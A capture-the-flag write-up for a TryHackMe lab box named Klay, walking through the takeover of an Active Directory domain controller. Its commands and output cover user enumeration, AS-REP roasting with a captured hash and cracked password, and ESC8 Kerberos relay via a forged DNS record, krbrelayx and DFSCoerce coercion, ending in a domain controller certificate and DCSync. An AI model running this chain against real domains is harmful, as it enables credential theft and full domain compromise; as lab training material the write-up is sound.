---
title: 'THM Industrial CTF Klay box writeup '
---
THM Industrial CTF Klay writeup
===
## Table of Contents
[TOC]
# بسم الله الرحمن الرحيم
<br>
## Description
NullRook finds a server that appears hardened, and there is no clear way of compromising it. But enumeration is key, and knowing your environment is a sure way to guarantee victory. ZeroTrace reminded NR to relay whatever information is found back to base once the target has been taken down.
> It implies it needs alot of enumeration and there is relaying involved.
> Aslo the challenge name (klay) implies "kerb relay"
## Recon
```java!
─$ nmap -Pn -sCV 10.10.225.160
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-29 20:31:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-29T20:32:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:KlayComputer.klay.thm
| Not valid before: 2025-05-10T02:29:37
|_Not valid after: 2026-05-10T02:29:37
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:KlayComputer.klay.thm
| Not valid before: 2025-05-10T02:29:37
|_Not valid after: 2026-05-10T02:29:37
|_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-29T20:32:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:KlayComputer.klay.thm
| Not valid before: 2025-05-10T02:29:37
|_Not valid after: 2026-05-10T02:29:37
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:KlayComputer.klay.thm
| Not valid before: 2025-05-10T02:29:37
|_Not valid after: 2026-05-10T02:29:37
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: KLAY
| NetBIOS_Domain_Name: KLAY
| NetBIOS_Computer_Name: KLAYCOMPUTER
| DNS_Domain_Name: klay.thm
| DNS_Computer_Name: KlayComputer.klay.thm
| DNS_Tree_Name: klay.thm
| Product_Version: 10.0.17763
|_ System_Time: 2025-06-29T20:32:36+00:00
|_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=KlayComputer.klay.thm
| Not valid before: 2025-05-09T01:38:50
|_Not valid after: 2025-11-08T01:38:50
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: KLAYCOMPUTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-29T20:32:37
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
```
> Usual AD ports
```
kaly.thm
klaycomputer.klay.thm
```
> To add to your /etc/hosts with the ip
## Finding creds
+ Anonymous access is blocked, the guest account also disabled
+ No website or any service to find users so we will brute them
```javas!
─$ kerbrute userenum --dc KLAYCOMPUTER.klay.thm -d klay.thm /usr/share/seclists/Usernames/Names/names.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 06/29/25 - Ronnie Flathers @ropnop
2025/06/29 16:36:09 > Using KDC(s):
2025/06/29 16:36:09 > KLAYCOMPUTER.klay.thm:88
2025/06/29 16:36:13 > [+] VALID USERNAME: andie@klay.thm
2025/06/29 16:36:14 > [+] VALID USERNAME: ardavan@klay.thm
2025/06/29 16:36:16 > [+] VALID USERNAME: audrye@klay.thm
2025/06/29 16:36:16 > [+] VALID USERNAME: aurlie@klay.thm
2025/06/29 16:36:18 > [+] VALID USERNAME: berti@klay.thm
2025/06/29 16:36:20 > [+] VALID USERNAME: blanche@klay.thm
2025/06/29 16:36:20 > [+] VALID USERNAME: bloom@klay.thm
2025/06/29 16:36:21 > [+] VALID USERNAME: brock@klay.thm
...
```
> Through kerbrute we find around 50 users
+ Next step is to authenticate so we need to find password for one of the users and ASREPROASTING is the key to this
```javascript!
└─$ impacket-GetNPUsers klay.thm/ -usersfile users.txt -no-pass
[-] User kristian doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User laurene doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User leesa doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ling-zhong doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User loan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lyssa doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User missie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nguyet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User norris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User patch doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User perle doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$pieter@KLAY.THM:888417f597c63244752f922e8e575d11$0fa38b2ea58ab0ef600f03f06f44efa6a73f9ce06905c89b936e3adb7965d0c8f259fd806704c9235d840b30ec79d406a304de0b7b70c383dd864046e3f03c5d1976b4ce4db8bfdb1ef0121587dda5ffbf846f8c9996d2fd1ad6e52f1aa22a6fe9cb45032de0f1b1217f46d38672357d8f8501becb29745524d6ff8e464f2281f796946ce5c09c61f50cd77410191da5fc058cb05fe966d0270e80f850cf73fd4238a5689591464c714be47e97bb540fdc2e81dff990d6bafb0b044e9b2a822e73fd30bf8771bae98b00117268e1769c309ecccffa4630ab4a74e39f0e2999d57cdbdd5b
[-] User quintilla doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rainer doesn't ha
```
> user pieter is found so let's try cracking his hash
> Note the password has the word "relay" in it
> Also user pieter has write permission on user called "svc_ca", this user was initially disabled, we can enable him and get his password but it servers no purpose
## Port 80
+ This is the Microsoft Active Directory Certificate Services web page where we can request a certificate
+ Our current user doesn't have access to the machine and trying to get a certificate for him to authenticate also won't work
+ Running certipy on the target reveals that it's vulnerable to [ESC8](https://www.crowe.com/cybersecurity-watch/exploiting-ad-cs-a-quick-look-at-esc1-esc8)
```java!
$ certipy find -u pieter@klay.thm -p 'relayboy22!' -target klay.thm -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: klay.thm.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: KlayComputer.klay.thm.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'klay-KLAYCOMPUTER-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'klay-KLAYCOMPUTER-CA'
[*] Checking web enrollment for CA 'klay-KLAYCOMPUTER-CA' @ 'KlayComputer.klay.thm'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : klay-KLAYCOMPUTER-CA
DNS Name : KlayComputer.klay.thm
Certificate Subject : CN=klay-KLAYCOMPUTER-CA, DC=klay, DC=thm
Certificate Serial Number : 498DCBE91B891FAA44DA223858928F1E
Certificate Validity Start : 2025-05-10 02:26:38+00:00
Certificate Validity End : 2075-05-10 02:36:38+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : KLAY.THM\Administrators
Access Rights
ManageCa : KLAY.THM\Administrators
KLAY.THM\Domain Admins
KLAY.THM\Enterprise Admins
ManageCertificates : KLAY.THM\Administrators
KLAY.THM\Domain Admins
KLAY.THM\Enterprise Admins
Enroll : KLAY.THM\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates : [!] Could not find any certificate templates
```
+ In normal cases it would be done using NTLM relay but not our case it won't work
+ Our second approach is to use kerberos relay not NTLM, and this requires adding a dnsRecord that points to our kali machine, then coercing to force the DC to authenticate to use
+ Next is capturing his capturing his hash and relay it back to the ADCS endpiont.
# krbrelay
### 1. Add dnsRecord
```java!
-$ bloodyAD --host klaycomputer.klay.thm -u 'pieter' -p 'relayboy22!' -k -d 'klay.thm' add dnsRecord 'KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <attacker_ip>
[+] KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added │
```
### 2. Run krbrelay
```java!
└─$ python /opt/opt/krbrelayx/krbrelayx.py -t 'http://KLAYCOMPUTER.klay.thm/certsrv/certfnsh.asp' --adcs --template DomainController -v 'KLAYCOMPUTER$'
```
### 3. Coerce and force the DC to authenticate to us
+ In another terminal while our krbrelayx is waiting, run this command
```java
$ nxc smb klay.thm -u pieter -p relayboy22\! -M coerce_plus -o LISTENER=KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
SMB 10.10.225.160 445 KLAYCOMPUTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:KLAYCOMPUTER) (domain:klay.thm) (signing:True) (SMBv1:False)
SMB 10.10.225.160 445 KLAYCOMPUTER [+] klay.thm\pieter:relayboy22!
COERCE_PLUS 10.10.225.160 445 KLAYCOMPUTER VULNERABLE, DFSCoerce
```
+ The output on krbrelayx terminal:
> Nice, now we can use this pfx file to authenticate and perform DCSync to dump users hashes
```java!
-$ certipy auth -pfx KLAYCOMPUTER\$.pfx -domain klay.thm -dc-ip 10.10.225.160
```
# DCSync
+ Now all is left to use the administrator NTLM hash to login and grab the flag
+ Thank you for reading
# Credits
+ Team: Toasters
+ ʎɐsǝǝu [HackTheBox](https://app.hackthebox.com/profile/1725001)
Google Drive
Gist
Clipboard
Sign in via Google
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
